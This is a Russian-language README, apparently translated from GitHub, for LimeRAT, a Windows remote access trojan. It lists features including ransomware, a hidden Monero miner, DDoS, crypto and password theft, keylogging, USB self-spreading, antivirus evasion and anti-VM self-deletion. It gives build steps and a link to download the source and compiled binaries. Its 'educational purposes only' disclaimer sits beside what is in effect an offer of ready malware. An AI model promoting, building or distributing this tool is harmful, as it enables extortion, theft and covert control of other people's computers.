Устарело. Архивируйте вместо удаления
LimeRAT v0.1.9
Инструмент удаленного администрирования для Windows
Описание
Простой, но мощный RAT для Windows-машин. Этот проект прост и легок для понимания, он должен дать вам общие знания о вредоносных программах на dotNET и о том, как они работают.
Основные возможности
- .NET
- Написан на Visual Basic .NET, клиенту требуется зависимость от фреймворка 2.0 или 4.0, а сервер — 4.0
- Соединение
- Использование pastebin.com в качестве ip:port, вместо DNS noip.com. А также использование нескольких портов
- Плагин
- Использование системы плагинов для уменьшения размера заглушки и снижения обнаружения антивирусом
- Шифрование
- Связь между сервером и клиентом зашифрована с помощью AES
- Распространение
- Заражение всех файлов и папок на USB-накопителях
- Обход
- Низкое обнаружение антивирусом и незаметный метод автозапуска
- Легковесность
- Размер полезной нагрузки около 25 КБ
- Антивиртуальные машины
- Самоудаляется, если машина виртуальная, чтобы избежать сканирования или анализа
- Вымогатель
- Шифрует файлы на всех жестких дисках и USB с расширением .Lime
- Майнер XMR
- Высокопроизводительный майнер Monero на процессоре с оптимизациями для простоя/активности пользователя
- DDoS
- Создание мощной DDoS-атаки для вывода онлайн-сервиса из строя
- Крипто-стилер
- Кража конфиденциальных данных криптовалют
- Блокировщик экрана
- Предотвращает доступ пользователя к графическому интерфейсу Windows
- И многое другое
- Автоматическая задача при подключении
- Принудительное включение Windows RDP
- Постоянство
- Файловый менеджер
- Кража паролей
- Удаленный рабочий стол
- Похититель Bitcoin
- Загрузчик
- Кейлоггер
Предварительные требования
Для открытия проекта вам потребуется:
- Visual Studio 2017
- Этот репозиторий
Взгляд
Проект
Вымогатель
Критический процесс
Пример плагина
VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)
Msgbox("Hello Client!")
Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be showen in [LOG] Tab
End Sub
End Class
C#
public class Main
{
// Simple Msgbox
public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, string PB)
{
Msgbox("Hello Client!");
Send("MSG" + SPL + "Hello Server!");
// Client will send msg back to server, MSG will be showen in [LOG] Tab
}
}
Тестирование
- Откройте "LimeRAT.sln"
- Установите компилятор в режим "Отладка"
- В обозревателе решений щелкните правой кнопкой мыши "Solution LimeRAT Project" и нажмите "Перестроить решение"
- Нажмите кнопку Run. Учтите, что и клиент, и сервер работают на localhost
Компиляция
- Откройте "LimeRAT.sln"
- Установите компилятор в режим "Release"
- В обозревателе решений щелкните правой кнопкой мыши "Solution LimeRAT Project" и нажмите "Перестроить решение"
- Все будет находиться в "\Project_EXE\Release"
- Преобразуйте stub.exe в stub.il с помощью Ildasm
Загрузка исходного кода и скомпилированной версии
https://github.com/NYAN-x-CAT/Lime-RAT/releases
Этот проект тестировался только в локальной лабораторной сети (LAN). Я не тестировал его во внешней лабораторной сети (WAN).
Сервер тестировался на Windows 10, клиент — на виртуальной машине Windows 7.
Примечания
- При использовании вымогателя точка восстановления не будет удалена, если только полезная нагрузка не запущена с высокими привилегиями
- Anti-Kill (BSOD) не будет работать, если только полезная нагрузка не запущена с высокими привилегиями
Нашли баг? Пожалуйста, сообщите о нем здесь https://github.com/NYAN-x-CAT/Lime-RAT/issues/new
Автор
Пожертвования
Купите мне кофе!
- XMR:
49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2
- BTC:
12hTx7u7AqdNr8qo4UFuLwb6XAVjoDioax
Поддержка
Отказ от ответственности
Я, создатель, не несу ответственности за любые действия и/или ущерб, причиненные этим программным обеспечением.
Вы несете полную ответственность за свои действия и признаете, что это программное обеспечение было создано только в образовательных целях.
Основная цель этого программного обеспечения НЕ заключается в злонамеренном использовании или использовании в любой системе, которой вы не владеете или не имеете права использовать.
Используя это программное обеспечение, вы автоматически соглашаетесь с вышеизложенным.
Лицензия

Этот проект лицензирован в соответствии с MIT License — подробнее в файле LICENSE.